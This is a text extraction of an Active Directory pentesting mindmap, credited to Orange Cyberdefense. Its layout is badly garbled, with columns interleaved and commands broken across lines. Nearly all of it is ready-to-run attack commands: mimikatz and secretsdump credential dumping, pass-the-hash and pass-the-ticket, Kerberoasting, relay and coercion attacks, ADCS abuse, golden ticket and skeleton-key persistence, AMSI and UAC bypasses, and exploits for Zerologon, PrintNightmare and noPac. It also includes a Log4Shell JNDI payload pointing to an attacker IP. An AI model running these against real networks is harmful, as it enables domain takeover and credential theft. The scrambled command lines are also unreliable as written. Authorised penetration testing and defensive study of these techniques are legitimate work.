Lateral Move

WSUSpendu.ps1 # need compromised WSUS

WSUSpect server

CMPivot

sccm admin abuse sccm PowerSCCM Administrator access

SharpSCCM

cme mssql <ip> -u <user> -p <password> -d

find mssql access <domain>

MATCH p=(u:User)-[:SQLAdmin]->(c:Computer)
Users with SQLadmin RETURN p

EXECUTE sp_configure 'show advanced EXECUTE sp_configure 'xp_cmdshell', 1;

options', 1; RECONFIGURE; RECONFIGURE; EXEC xp_cmdshell '<cmd>' Low Access

Get-SQLServerLinkCrawl -username <user> -

password <pass> -Verbose -Instance
<sql_instance> -Query "<query>" MSSQL
MSSQL
trust link
use exploit/windows/mssql/mssql_linkcrawler

enum_db

enable_xp_cmdshell xp_cmdshell <cmd> Low Access

mssqlclient.py -windows-auth exec_as_user <user>

<domain>/<user>:<password>@<ip> (pr #1397) enum_impersonate MSSQL
exec_as_login <login>

valid credentials
xp_dir_tree <ip> coerce SMB ->

GetADUsers.py -all -dc-ip <dc_ip>

trustlink sp_linkedservers use_link MSSQL
<domain>/<username>

cme smb <ip> -u <user> -p '<password>' -- cme smb -u <user> -p <pass>' <ip> --local-auth
users Users
Get all users
Local User Administrator access
impacket like cleartext pasword without
ldeep ldap -u <user> -p '<password>' -d domain/
<domain> -s ldap://<dc_ip> users

psexec.py <domain>/<user>:<password>@<ip>
cme smb <ip> -u <user> -p <password> --
Account Authority/sytem
enumerate SMB share shares
interactive-shell psexec.exe -AcceptEULA \\<ip>

cme smb <ip> -u <user> -p <password> -M mimikatz "privilege::debug sekurlsa::pth /user:

slinky -o NAME=<filename> SERVER=<ip> <user> /domain:<domain> /ntlm:<hash>"
Coerce SMB ->
exploit smbshare
drop .url file
atexec.py <domain>/<user>:<password>@<ip>
"command"
bloodhound-python -d <domain> -u <user> -p Authority/sytem
<password> -gc <dc> -c all smbexec.py <domain>/<user>:
<password>@<ip> Administrator access
./rusthound -d <domain_to_enum> -u
'<user>@<domain>' -p '<password>' -o wmiexec.py <domain>/<user>:

🔥 bloodhound
<outfile> -z

import-module sharphound.ps1;invoke-
ACL pseudo-shell (file write and read)
<password>@<ip>

dcomexec.py <domain>/<user>:
bloodhound -collectionmethod all -domain <password>@<ip>
<domain> Delegation
Domain enum
Password crackmapexec smb <ip_range> -u <user> -p
sharphound.exe -c all -d <domain> Users
Cleartext password <password> -d <domain>

ldeep ldap -u <user> -p '<password>' -d crackmapexec smb <ip_range> -u <user> -p

enum ldap <domain> -s ldap://<dc_ip> all <backup_folder> <password> -local-auth

Powerview / SharpView WinRM evil-winrm -i <ip> -u <user> -p <password>

Low access

adPeas xfreerdp /u:<user> /d:<domain> /p:

High access
RDP <password> /v:<ip>
pingcastle
smbclient.py <domain>/<user>:
Get-DomainUser -SPN -Properties SMB <password>@<ip> search files
SamAccountName, ServicePrincipalName

MATCH (u:User {hasspn:true}) RETURN u crackmapexec mssql <ip_range> -u <user> -p

Get kerberoastable users
<password>
MSSQL
MATCH (u:User {hasspn:true}), (c:Computer), MSSQL
p=shortestPath((u)-[*1..]->(c)) RETURN p mssqlclient.py -windows-auth
Got Account on the domain
authenticated
(cleartext pass / kerberos / NTLM)
🔥 kerberoasting
GetUserSPNs.py -request -dc-ip <dc_ip>
<domain>/<user>:<password>@<ip>

<domain>/<user>:<password> psexec.py -hashes ":<hash>" <user>@<ip>

hash found (TGS)
Get hash Authority/sytem
Rubeus kerberoast interactive-shell psexec.exe -AcceptEULA \\<ip>

dnstool.py -u 'DOMAIN\user' -p 'password' -- mimikatz "privilege::debug sekurlsa::pth /user:

record '*' --action query <dc_ip> Scan network <user> /domain:<domain> /ntlm:<hash>"
Enum dns

Enumerate AD CS
🔥 certipy find -u <user>@<domain> -p
<password> -dc-ip <domaincontroller> ADCS
Lateral move atexec.py -hashes ":<hash>" <user>@<ip>
"command"
Authority/sytem

smbexec.py -hashes ":<hash>" <user>@<ip> Administrator access

cme ldap <ip> -u <user> -p <password> -M
Enumerate Azure AD connect find AAD connect server from MSOL description get-desc-users | grep -i MSOL
wmiexec.py -hashes ":<hash>" <user>@<ip>

cme smb <ip> -u <user> -p <password> -M pseudo-shell (file write and read) dcomexec.py -hashes ":<hash>" <user>@<ip>
webdav #find

crackmapexec smb <ip_range> -u <user> -d

start webdav with
Documents.searchConnector-ms file
Webdav
add attack computer in dns
cme smb <ip> -u '<user>' -p '<pass>' -M drop- <domain> -H ':<hash>'
sc
🔥 Pass the hash (PTH) crackmapexec smb <ip_range> -u <user> -H ':
<hash>' --local-auth
dnstool.py -u '<domain>\<user>' -p '<pass>' --
record
'<attack_name>' --action add --data <ip_listen>
WinRM evil-winrm -i <ip> -u <user> -H <hash>
<dc_ip>

reg.py <domain>/<user>@<ip> -hashes ': Low access

coerce with <hash>' add -keyName
<attacker_hostname>@80/something as target Coerce HTTP ->
'HKLM\System\CurrentControlSet\Control\Lsa' - High access
v 'DisableRestrictedAdmin' -vt 'REG_DWORD' - xfreerdp /u:<user> /d:<domain> /pth:<hash>
Coerce RDP vd '0' /v:<ip>
rpcdump.py <domain>/<user>: printerbug.py '<domain>/<username>:
<password>@<domain_server> | grep MS-RPRN <password>'@<Printer IP> <listener_ip>
SMB smbclient.py -hashes ":<hash>" <user>@<ip> search files
PetitPotam.py -d <domain> -u <user>-p NTLM Hash
Coerce SMB ->
<password> <listener_ip> <target_ip>
crackmapexec mssql <ip_range> -H ':<hash>'
Privilege escalation 🔥 coercer.py -u <user> -d <domain> -p
<password> -t <target> -l <attacker_ip>
MSSQL
mssqlclient.py -windows-auth -hashes ":
MSSQL

Get-ChildItem -Path <hash>" <domain>/<user>@<ip>

HKLM:\SOFTWARE\Policies\Microsoft\Windows\
SrpV2\Exe (dll/msi/...) exploit ! Known vulnerabilities
Get Applocker info
Rubeus ptt /ticket:<ticket>
connect to computer Lateral move
winpeas.exe Rubeus asktgt /user:victim /rc4:<rc4value> Rubeus createnetonly
/program:C:\Windows\System32\
https://amsi.fail/ [cmd.exe||upnpcont.exe] Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
Pass the ticket
AMSI bypass Reflection method getTGT.py <domain>/<user> -hashes :<hashes>
overpass the hash / pass the key (PTK)
Patching amsi.dll getTGT.py -aesKey '<key>'
<domain>/<user>@<ip>
User account
search password files findstr /si 'password' *.txt *.xml *.docx
clear text pass
ticketConverter.py <kirbi||ccache>
Convert format <ccache||kirbi>
use C:\Windows\Tasks

export KRB5CCNAME=/root/impacket- impacket tools: Same as Pass the hash but use
use C:\Windows\Temp Administrator access
examples/domain_ticket.ccache : -k and -no-pass for impacket

installutil.exe /logfile= /LogToConsole=false /U

AppLocker (whitelisting) bypass Powershell CLM bypass C:\runme.exe Low access (without applocker) mimikatz kerberos::ptc "<ticket>"

mshta.exe my.hta Rubeus.exe ptt /ticket:<ticket>

Pass the ticket
(ccache / kirbi)
MSBuild proxychains secretsdump -
k'<domain>'/'<user>'@'<ip>' see dcsync

FodHelper
tgssub.py -in <ticket.ccache> -out
Kerberos <newticket.ccache> -altservice " Pass the Ticket
User Access Control (UAC) bypass WSReset
modify SPN <service>/<target>" #pr 1256
Low access
MSDT
impacket tools: Same as Pass the hash but use
Administrator access
SMBGhost CVE-2020-0796 : -aesKey for impacket (and use FQDN)

aesKey
CVE-2021-36934 proxychains secretsdump -aesKey <key>
see dcsync
(HiveNightmare/SeriousSAM) '<domain>'/'<user>'@'<ip>'

RoguePotato proxychains lookupsid.py

<domain>/<user>@<ip> -no-pass -domain-sids Users
Juicy Potato / Lovely Potato
Admin Access
service account (IIS/Mssql)
(got SEImpersonate)
🔥 PrintSpoofer
proxychains mssqlclient.py -windows-auth
<domain>/<user>@<ip> -no-pass MSSQL

certipy req -k -ca <ca> ticketer.py -nthash <hash> -domain-sid proxychains secretsdump -no-pass
see dcsync
-template Machine -target <dc> certipy auth -pfx <pfxile> <domain_sid> -domain <domain> -spn '<domain>'/'<user>'@'<ip>'
cifs/<dc> <targetUser>
Machine NT Hash proxychains atexec.py -no-pass
certipy shadow auto -u Socks (with NTLM relay)
./Rubeus tgtdeleg /nowrap TGT (pass the ticket) '<machine>$'@<domain> -k account <domain>/<user>@<ip> "command"
CertPotato '<machine$>' Authority/sytem Administrator access
shadow credentials pseudo-shell (file write and read)
proxychains smbexec.py -no-pass
<domain>/<user>@<ip>
.\KrbRelayUp.exe relay -Domain <domain> - ./KrbRelayUp.exe spawn -m rbcd -d <omdain> -
CreateNewComputerAccount -ComputerName dc <dc> -cn <computer_name>-cp

🔥 <computer$> -ComputerPassword <password> <omputer_pass> proxychains smbclient.py -no-pass

<user>@<ip> search files
KrbRelayUp

... get hash NTLM from certificate certipy auth -pfx <crt_file> -dc-ip <dc_ip> NTLM hash

gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-

pass "<cert-password>"] "
<fqdn_domain>/<user>" "<tgt_ccache_file>"
Certificate (pfx)
Rubeus.exe asktgt /user:"<username>"
/certificate:"<pfx_file>" [/password:" Pass the ticket
pkinit <certificate_password>"] /domain:"<fqdn-
domain>" /dc:"<dc>" /show

Pass the Certificate certipy auth -pfx <crt_file> -dc-ip <dc_ip>

Schannel certipy auth -pfx <crt_file> -ldap-shell add_computer set_rbcd RBCD

got administrator access on one machine

PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp

mimikatz "!+" "!processprotect

LSASS as a Protected Process /process:lsass.exe /remove" "privilege::debug"
"token::elevate" "sekurlsa::logonpasswords"
"!processprotect /process:lsass.exe" "!-" #with
mimidriver.sys

mimikatz "privilege::debug"
procdump.exe -accepteula -ma lsass.exe "sekurlsa::minidump lsass.dmp"
lsass.dmp "sekurlsa::logonPasswords" "exit"
Known vulnerabilities Trust relationship / Forest to Forest

mimikatz "privilege::debug" "token::elevate" nltest.exe /trusted_domains

rpcclient $> lookupnames <name> "sekurlsa::logonpasswords" "exit" User + Pass
wmic useraccount get name,sid Extract credentials
auxiliary/admin/kerberos/ms14_068_kerberos_ch dom admin from LSASS ([System.DirectoryServices.ActiveDirectory.Do
load kiwi Hashes NTLM
ecksum creds_all main]::GetCurrentDomain()).GetAllTrustRel
Pass the ticket
ationships()
MS14-068 FindSMB2UPTime.py <ip> Admin Lateral move (PTH/PTK)
goldenPac.py -dc-ip <dc_ip> cme smb <ip_range> -u <user> -p <password> - (clear text pass in some case)
<domain>/<user>:'<password>'@<target> M lsassy Enumeration Get-DomainTrust -Domain <domain>

privexchange
python privexchange.py -ah
<attacker_host_or_ip> <exchange_host> -u
dom admin 🔥 lsassy -d <domain> -u <user> -p
<password> <ip>
Get-DomainTrustMapping
Coerce HTTP ->
(CVE-2019-0724, CVE-2019-0686) <user> -d <domain> -p <password> Admin ldeep ldap -u <user> -p '<password>' -d
<domain> -s ldap://<dc_ip> trusts
cme smb <ip_range> -u <user> -p '<password>'
cme smb <ip> -u <user> -p <password> -M --sam
scan nopac mimikatz kerberos::golden /user:Administrator
/krbtgt:<HASH_KRBTGT> /domain:<domain>
hashdump Get-DomainSID -Domain <domain> mimikatz lsadump::dcsync /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
.\noPac.exe -domain <domain> -user <user> - Get-DomainSID -Domain <target_domain> /user:<domain>\krbtgt

🔥 SamAccountName / nopac
CVE-2021-42287/CVE-2021-42278
pass <pass> /dc <dc_fqdn> /mAccount
<machine_account> /mPassword
<machine_pass> /service cifs /ptt Delete computer
reg save HKLM\SAM <file>; reg save
HKLM\SECURITY <file>; reg save
HKLM\SYSTEM <file>
secretsdump.py -system SYSTEM -sam SAM
LOCAL ticketer.py -nthash <child_krbtgt_hash> -
Known vulnerabilities Pass the ticket DCSYNC DOM ADMIN lookupsid.py -domain-sids domain-sid <child_sid> -domain <child_domain>
Golden ticket <domain>/<user>:'<password>'@<dc_ip> 0 -extra-sid <parent_domain_sid>-519 goldenuser
with impacket : addcomputer.py / addspn.py /
mklink /d c:\shadowcopy \\? Hashes NTLM
renameMachine.py / getTGT.py /
\GLOBALROOT\Device\HarddiskVolumeShadow
renameMachine.py / getST.py raiseChild.py <domain>/<user>:'<password>'
shadow copies diskshadow list shadows all Copy1\
Extract credentials Lateral move PTH
from SAM Pass the ticket

🔥 CVE-2021-1675.py <domain>/<user>: Child Domain to Forest Compromise - extra SIDs mimikatz kerberos::golden /user:Administrator
<password>@<target> '\\<smb_server_ip>\ mimikatz "privilege::debug" "lsadump::sam" /domain:<domain> /sid:<domain_sid> /aes256:
PrintNightmare Admin (parent/child) (child/parent)
<share>\inject.dll' "exit" <trust_key_aes256> /sids:
(CVE-2021-1675 / CVE-2021-34527)
<target_domain_sid>-519 /service:krbtgt

🔥 Certifried certipy account create -u <user>@<domain> - certipy req -u 'certifriedpc$'@<domain> -p

🔥 secretsdump.py <domain>/<user>:
<password>@<ip> mimikatz lsadump::trust /patch
/target:<target_domain> /ptt

(CVE-2022-26923) p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -target <ca_fqdn> -ca certipy auth -pfx <pfx_file> -username '<dc>$' Delete computer
(need ADCS) 'certifriedpass' -dns '<fqdn_dc>' <ca_name> -template Machine Pass the ticket DCSYNC DOM ADMIN inter_realm_ticket TRUST (parent/child)
-domain <domain> -dc-ip <dc_ip>
reg.py <domain>/<user>:<password>@<ip> secretsdump.py -sam <sam_file> -system (child/parent) ticketer.py -nthash <trust_key> -domain-sid
backup -o '\\<smb_ip>\share' <system_file> LOCAL <child_sid> -domain <child_domain> getST.py -k -no-pass -spn cifs/<dc_fqdn>
-extra-sid <parent_domain_sid>-519 -spn <parent_domain>/trustfakeuser@<parent_domai
krbtgt/<parent_domain> goldenuser n> -debug
cme smb <ip_range> -u <user> -p '<password>'
--lsa
Cached domain logon MsCache 2 Breaking forest trust

🔥 secretsdump.py <domain>/<user>:
<password>@<ip> Machine account
(printerbug or petitpotam to force the DC of
the external forest to connect on a local
unconstrained delegation machine. Capture
Uncontrained delegation

Extract credentials from LSA User + Pass TGT, inject into memory and dcsync)
reg.py <domain>/<user>:<password>@<ip> secretsdump.py -security <security_file> - Service account
backup -o '\\<smb_ip>\share' system <system_file> LOCAL MATCH p=(n:User)-[:MemberOf]->(m:Group)
Administrator access WHERE n.domain="<domain>" AND
Trust relationship
🔥 DonPAPI.py <domain>/<user>:
<password>@<target>
Users with foreign Domain Group Membership m.domain<>n.domain RETURN p

MATCH p=(n:Group {domain:"<domain>"})-

classic quick compromission methods
[:MemberOf]->(m:Group) WHERE
mimikatz.exe "sekurlsa::dpapi" m.domain<>n.domain AND n.name<>m.name
dpapi extract RETURN p
zerologon-scan '<dc_netbios_name>' '<ip>' ForeignGroupMember Groups with Foreign Domain Group Membership
secretsdump.py <domain>/<user>:
<passwor>@<ip> User + Pass
python3 cve-2020-1472-exploit.py Get-DomainForeignGroupMember -Domain
<MACHINE_BIOS_NAME> <ip> <target> convertfrom-sid <sid>
zerologon (unsafe) secretsdump.py search password files findstr /si 'password' *.txt *.xml *.docx Lateral move (Clear text pass)
(CVE-2020-1472) <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -
no-pass -just-dc-user "Administrator" python3 restorepassword.py -target-ip <IP> User on both domains ACL
secretsdump.py -hashes :<HASH_admin> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHIN search stored password lazagne.exe all
<DOMAIN>/Administrator@<IP> E_BIOS_NAME> -hexpass <HEXPASS> Admin
password reuse lateral move (creds/pth/...)
%appdata%\Local\Google\Chrome\User
Domain Admin
chrome Data\Default SharpChromium.exe
Eternal Blue mimikatz kerberos::golden /user:Administrator
MS17-010 exploit/windows/smb/ms17_010_eternalblue /krbtgt:<HASH_KRBTGT> /domain:<domain>
no credentials /sid:<user_sid> /sids:<RootDomainSID>-
.\incognito.exe execute -c "<domain>\<user>"
mimikatz lsadump::dcsync /domain:<domain> <GROUP_SID_SUP_1000> /ptt
use scanner/smb/smb_enum_gpp .\incognito.exe list_tokens -u powershell.exe
SYSVOL & GPP /user:<domain>\krbtgt
cme smb <ip_range> # enumerate smb hosts (SID filtering, Find group with SID > 1000)
MS14-025
findstr /S /I cpassword \\<FQDN>\sysvol\ use incognito impersonate_token <domain>\\<user> Get-DomainSID -Domain <domain> Get-DomainGroupMember -Identity "<group>" -
nmap -sP -p <ip> # ping scan <FQDN>\policies\*.xml ACL Golden ticket Get-DomainSID -Domain <target_domain> Domain <target_domain> ticketer.py -nthash <krbtgt_hash> -domain-sid
<from_sid> -domain <from_domain>
-extra-sid <to_domain>-<group_id> Pass the ticket
nmap -PN -sV --top-ports 50 --open <ip> # cme smb <ip> -u <user> -p <password> -M User + Pass
auxiliary/scanner/http/tomcat_enum goldenuser //(group id must be > 1000)
quick scan impersonate
tomcat/jboss manager exploit/multi/http/tomcat_mgr_deploy Forest To Forest - extra SID
token manipulation (SID History / TREAT_AS_EXTERNAL)
nmap -PN --script smb-vuln* -p139,445 <ip> # irs.exe exec --pid <pid> --command ticketer.py -nthash <trust_key> -domain-sid
search smb vuln java rmi exploit/multi/misc/java_rmi_server irs.exe list <command> <from_domain_sid> -domain <from_domain>
Low hanging fruit -extra-sid <to_domain>-<group_id> -spn
Scan Network krbtgt/<to_domain> trustuser //(group id must
getST.py -k -no-pass -spn cifs/<dc_fqdn>
<parent_domain>/trustfakeuser@<parent_domai
Admin Get the trust ticket in the ntds
nmap -PN -sC -sV -oA <output> <ip> # classic java serialized port ysoserial NT hash Lateral move PTH be > 1000)
find vulnerable host Trust ticket (TARGET_DOMAIN$) n> -debug
scan
masky - d <domain> -u <user> (-p
Domain Admin
vulnerable product with cve searchsploit <password> || -k || -H <hash>) -ca <certificate ccache Lateral move Pass the ticket
nmap -PN -sC -sV -p- -oA <output> <ip> # full authority> <ip> Get-SQLServerLinkCrawl -username <user> -
scan Low Access Extract credentials with certificate password <pass> -Verbose -Instance
authentication (ADCS required) pfx Lateral move Pass the certificate <sql_instance>
proxylogon
nmap -sU -sC -sV -oA <output> <ip> # udp Forest to Forest Compromise - MSSQL trusted MSSQL
scan links
proxyshell Impersonate RDP Session psexec -s -i cmd query user cmd /k tscon <id> /dest:console Lateral move RDP mssqlclient.py -windows-auth
<domain>/<user>:<password>@<ip> (pr #1397) trustlink sp_linkedservers use_link
log4shell ${jndi:ldap://<ip>:<port>/o=reference} rogueJndi-1.0.jar
azuread_decrypt_msol_v2.ps1
nmcli dev show eth0 # show domain name & Dump cleartext password of MSOL Account on
dns AAD Connect server DCSync
database credentials use admin/mssql/mssql_enum_sql_logins MSSQL connection cme smb <ip> -u <user> -p <password> -M
Hydrid-Environement (Azure AD Connect)
msol
nslookup -type=SRV _ldap._tcp.dc._msdcs.
Find DC IP <domain> ...

dig axfr <domain_name> @<name_server>

zone transfer

enum4linux -a -u "" -p "" <dc-ip> &&

enum4linux -a -u "guest" -p "" <dc-ip>

smbmap -u "" -p "" -P 445 -H <dc-ip> &&

smbmap -u "guest" -p "" -P 445 -H <dc-ip>

smbclient -U '%' -L //<dc-ip> && smbclient -U Persistence

List guest access on smb 'guest%' -L //<dc-ip>

Is enterprise admin ?
net group "domain admins" myuser /add
share cme smb <ip> -u '' -p '' # enumerate null /domain
session
GG good luck for the report ! ticketer.py -aesKey <aeskey> -domain-sid
Pentesting active cme smb <ip> -u 'a' -p '' # enumerate
anonymous access
<domain_sid> -domain <domain> <anyuser>

directory got username but no password

Enterprise Admin
Golden ticket mimikatz "kerberos::golden /user:<admin_user>
/domain:<domain> /sid:<domain-sid>/aes256:
<krbtgt_aes256> /ptt"
nmap -n -sV --script "ldap* and not brute" -p cme <IP> -u 'user' -p 'password' --pass-pol
389 <dc-ip> mimikatz "kerberos::golden /sid:
user found
enum4linx -u 'username' -p 'password' -P <IP> <current_user_sid> /domain:<domain-sid>
Enumerate ldap ldapsearch -x -h <ip> -s base /target:<target_server> /service:
Get password policy (need creds, but you <target_service> /aes256:
should get the policy before starting a spray) Get-ADDefaultDomainPasswordPolicy <computer_aes256_key> /user:<any_user> /ptt"

Get-ADFineGrainedPasswordPolicy -filter * Silver Ticket ticketer.py -nthash <machine_nt_hash> -

enum4linux -U <dc-ip> | grep 'user:'
domain-sid <domain_sid> -domain <domain>
Get-ADUserResultantPasswordPolicy -Identity <anyuser>
cme smb <ip> --users
FGPP <user> Permissions move
Diamond ticket
net rpc group members 'Domain Users' -W
'<domain>' -I '<ip>' -U '%' ldapsearch-ad.py --server '<dc>' -d <domain> - #Administrators, Domain Admins, or Enterprise
user found
u <user> -p <pass> --type pass-pols
Find user list
🔥
Admins as well as Domain Controller computer Domain admin Saphire Ticket
Password spray accounts Persistence
nmap -p 88 --script=krb5-enum-users --script-
cme smb <dc-ip> -u user.txt -p password.txt -- Domain Admin PowerShell New-ItemProperty
args="krb5-enum- cme smb <dcip> -u <user> -p <password> -d
users.realm='<domain>',userdb= no-bruteforce # test user=password mimikatz lsadump::dcsync /domain: “HKLM:\System\CurrentControlSet\Control\Lsa\
<domain> --ntds
OSINT - enumerate username on internet <users_list_file>" <ip> <target_domain> /user: Lateral move ” -Name “DsrmAdminLogonBehavior” -Value 2 -

🔥
cme smb <dc-ip> -u user.txt -p password.txt # <target_domain>\administrator Directory Service Restore Mode (DSRM) PropertyType DWORD
Clear text credentials found dcsync secretsdump.py '<domain>/<user>:
multiple test (carrefull of lock policy) Crack Hash <pass>'@<ip>
secretsdump mimikatz "privilege::debug" "misc::skeleton"
sprayhound -U <users.txt> -d <domain> -dc '<domain>'/'<user>':'<password>'@'<domain_co Lateral move "exit"
🔥 responder -I eth0 (use --lm to force lm secretsdump.py -ntds ntds_file.dit -system Skeleton Key password is mimikatz
<dcip> ntroller>'
LLMNR / NBTNS/ MDNS downgrade) # disable smb & http if relay

Poisoning SMB -> Get-DomainUser -PreauthNotRequired - Whisker.exe

🔥 dump ntds.dit
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q
q
SYSTEM_FILE -hashes lmhash:nthash LOCAL -
outputfile ntlm-extract Crack Hash
mimikatz "privilege::debug" "misc::memssp"
IPV6 prefered to IPV4 mitm6 -d <domain> Custom SSP "exit" C:\Windows\System32\kiwissp.log
HTTP -> Properties SamAccountName can change
poisoning Got valid username msDS-KeyCredentialLInk certipy shadow auto '-u <user>@<domain>' -p
windows/gather/credentials/domain_hashdump
ARP poisoning bettercap Get ASREPRoastable users (need creds) MATCH (u:User {dontreqpreauth:true}), (Generic Write) + ADCS <password> -account '<target_account>' certipy forge -ca-pfx <ca_private_key> -upn
Shadow Credentials Pass the Certificate certipy ca -backup -ca '<ca_name>' -username <user>@<domain> -subject 'CN=
(c:Computer), p=shortestPath((u)-[*1..]->(c)) certsync -u <user> -p <password> -d
(need ADCS) <user>@<domain> -hashes <hash> <user>,CN=Users,DC=<CORP>,DC=<LOCAL>
RETURN p Domain admin <domain> -dc-ip <dcip> -ns <nsip> Golden certificate
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p
"CERTIFICATE_PASSWORD" --target
python GetNPUsers.py <domain>/ -usersfile pywhisker.py "TARGET_SAMNAME" --action "list" dpapi.py backupkeys -hashes ':<hash>' -t DC shadow
PetitPotam.py -d <domain> <listener_ip>
<target_ip> coerce SMB -> <usernames.txt> -format hashcat -outputfile Administrator@<dc_ip> --export DonPAPI -pvk <domain_backupkey.pvk> - H ': Credentials
<hashes.domain.txt> # note : dpapi.py != DonPAPI <hash>' <domain>/<user>@<ip_range>
coerce Unauthent PetitPotam (CVE-2022-26925) Hash found (ASREP) Acl manipulation
Get hash net group "<group>" <myuser> /add /domain
Self (Self-Membership) on Group
Rubeus.exe asreproast /format:hashcat ...
ldeep ldap -u <user> -p <pwd> -d <domain> -s ACL
GenericAll/WriteProperty on Group Add group member ldap://<dc> add_to_group "CN=<user>,DC=
ASREPRoast Rubeus.exe keberoast /domain:<domain> /dc: <domain>" "CN=<group>,DC=<domain>"
<dcip> /nopreauth: <asrep_user> /spns:
<users.txt> On Group WriteProperty (Self-Membership)

Hash found (TGS)

WriteDACL + WriteOwner
GetUserSPNs.py -no-preauth "<asrep_user>" -
Blind Kerberoasting WriteOwner on Group Give yourself Generic all owneredit.py dacledit.py
usersfile "<user_list.txt>" -dc-host "<dc_ip>" "
Kindly provided by Orange Cyberdefense ;-) <domain>"/
Some commands can break stuff, be sure to
know what are you doing ! msDs-AllowedToActOnBehalf RBCD
Please find legend below. python3 CVE-2022-33679.py On Computer GenericAll / GenericWrite
CVE-2022-33679 <domain>/<user> <target> Lateral move (PTT)
add Key Credentials shadow credentials

change password net user <user> <password> /domain User with clear text pass
Credits
targetedKerberoast.py -d <domain> -u <user> -
p <pass> hash found (TGS)
GenericAll / GenericWrite add SPN (target Kerberoasting)

mayfly (@M4yFly) cracking hash

add Key Credentials shadow credentials
inspired by / Sources
viking (@Vikingfr) john --format=lm hash.txt On User logon script Access
LM
Sant0rryu (@Sant0rryu) https://www.thehacker.recipes/ (@_nwodtuhs) hashcat -m 3000 -a 3 hash.txt
net user <user> <password> /domain

https://www.ired.team/ (@spotheplanet) john --format=nt hash.txt ForceChangePassword User with clear text pass
Jenaye (@jenaye_fr) net rpc password <user> <password> -S
NTLM <dc_fqdn>
https://ppn.snovvcrash.rocks/ (@snovvcrash) hashcat -m 1000 -a 3 hash.txt
Daahtk (@Daahtk)
https://book.hacktricks.xyz/ (@carlospolopm) aclpwn.py
john --format=netntlm hash.txt ACLs/ACEs
permissions
https://github.com/swisskyrepo/PayloadsAllThe acltoolkit
NetNTLMv1 hashcat -m 5500 -a 3 hash.txt <domain>/<user>:'<password>@<target> get-
Things/ (@pentest_swissky)
objectacl [-all| -object <object>]
https://crack.sh/
Legend https://blog.harmj0y.net/ (@harmj0y)
MATCH p=(g:Group)-[:ReadLAPSPassword]->
john --format=netntlmv2 hash.txt who can read LAPS (c:Computer) RETURN p
https://hausec.com/domain-penetration-
NetNTLMv2 User account
testing/ (@haus3c)
Bloodhound hashcat -m 5600 -a 0 hash.txt rockyou.txt clear text pass Get-LAPSPasswords -DomainController <ip_dc>
Crack Hash -Credential <domain>\<login> | Format-Table -
https://dirkjanm.io/ (@_dirkjan)
hashcat -m 13100 -a 0 spn.txt rockyou.txt AutoSize
PowerView
https://casvancooten.com/ (@chvancooten) Kerberos 5 TGS
Impacket john spn.txt --format=krb5tgs -- foreach ($objResult in $colResults)
wordlist=rockyou.txt {$objComputer = $objResult.Properties;
https://zer1t0.gitlab.io/posts/attacking_ad/ $objComputer.name|where
get laps passwords
crackmapexec {$objcomputer.name -ne
Kerberos 5 TGS AES128 hashcat -m 19600 -a 0 spn.txt rockyou.txt $env:computername}|%{foreach-object {Get- admin
https://beta.hackndo.com (@HackAndDo)
AdmPwdPassword -ComputerName $_}}}
certipy
and a lot more ... Kerberos 5 TGS AES256 hashcat -m 19700 -a 0 spn.txt rockyou.txt
Metsaploit cme ldap <dc_ip> -d <domain> -u <user> -p
Kerberos Delegation move
<password> --module laps
hashcat -m 18200 -a 0 AS-REP_roast-hashes
Windows tool Kerberos ASREP rockyou.txt ldeep ldap -u <user> -p '<password>' -d
use <domain> -s ldap://<dc_ip> delegations
post/windows/gather/credentials/enum_laps
Command hashcat -m 2100 -a 0 mscache-hash list delegations
MsCache 2 (slow) rockyou.txt findDelegation.py <domain>/<user>:
MATCH (gr:Group), (gp:GPO), p=((gr)- <password>@<ip>
dangerous (could break stuff) [:GenericWrite]->(gp)) RETURN p

🔥 very common and efficient technic (quick

win)
Get-DomainObjectAcl -SearchBase
Get-NetComputer -Unconstrained

"CN=Policies,CN=System,DC=blah,DC=com" -
ResolveGUIDs | ? {​​$_.ObjectAceType -eq Get-DomainComputer -Unconstrained -
"Group-Policy-Container" }​​| select ObjectDN, Properties DnsHostName
CVE (probably patched) SID of principals that can create new GPOs in
the domain ActiveDirectoryRights, SecurityIdentifier | fl
MATCH (c:Computer
how to read GPO Get unconstrained delegation machines {unconstraineddelegation:true}) RETURN c
Get-DomainOU | Get-DomainObjectAcl -
ResolveGUIDs | ? {​​$_.ObjectAceType -eq "GP-
Enumeration infos MATCH (u:User {owned:true}), (c:Computer
Link" -and $_.ActiveDirectoryRights -match
{unconstraineddelegation:true}),
return the principals that can write to the GP- "WriteProperty" }​​| select ObjectDN,
technique/status/explanation linux command p=shortestPath((u)-[*1..]->(c)) RETURN p
Link attribute on OUs SecurityIdentifier | fl
Highlight Technique 1 result / go to
windows command Unconstrained delegation privilege::debug sekurlsa::tickets /export
Generic Write on GPO Abuse GPO Access sekurlsa::tickets /export

windows command Result / go to 1 Kerberos TGT

Get tickets Rubeus dump /service:krbtgt /nowrap
DNSadmins abuse dnscmd.exe /config /serverlevelplugindll sc \\DNSServer stop dns
Technique 2 (CVE) technique/status/explanation or Admin
Entry point (CVE-2021-40469) <\\path\to\dll> # need a dnsadmin user sc \\DNSServer start dns UAC: ADS_UF_TRUSTED_FOR_DEL
linux command Result / go to 2 EGATION Rubeus dump /luid:0xdeadbeef /nowrap

if dc
windows command Rubeus monitor /interval:5
Kerberos TGT Pass The Ticket DCSync DomAdmin
technique/status/explanation go to (Force_connection_with_coerced_auth)
Technique3 assemble linux command
technique/status/explanation MITM (Listen and relay) Get-DomainComputer -TrustedToAuth -
Properties DnsHostName, MSDS-
Listener AllowedToDelegateTo

NetNtlmv1
🔥
Get-DomainUser -TrustedToAuth
responder -I eth0 (use --lm to force lm
downgrade) NetNtlmv2 MATCH (c:Computer), (t:Computer), p=((c)-
Get constrained delegation [:AllowedToDelegate]->(t)) RETURN p
Listen smbclient.py User
